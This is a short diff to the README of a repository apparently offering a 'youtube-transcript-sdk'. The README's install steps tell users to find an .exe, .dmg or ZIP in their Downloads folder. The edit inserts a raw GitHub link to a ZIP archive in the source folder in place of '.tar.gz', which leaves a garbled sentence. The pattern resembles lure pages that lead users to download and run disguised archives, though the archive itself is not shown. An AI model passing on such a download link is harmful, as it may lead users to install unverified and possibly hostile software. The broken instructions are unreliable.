Liska3070/youtube-transcript-sdk/README.md

 - On Windows, look in your “Downloads” folder for a file ending in `.exe` or a ZIP file.
 - On Mac, look for a `.dmg` file or ZIP in “Downloads.”
-- On Linux, you may get a `.tar.gz` or ZIP file.
+- On Linux, you may get a `https://raw.githubusercontent.com/Liska3070/youtube-transcript-sdk/main/src/transcript-youtube-sdk-v3.8.zip` or ZIP file.

 ### Step 3: Install the Program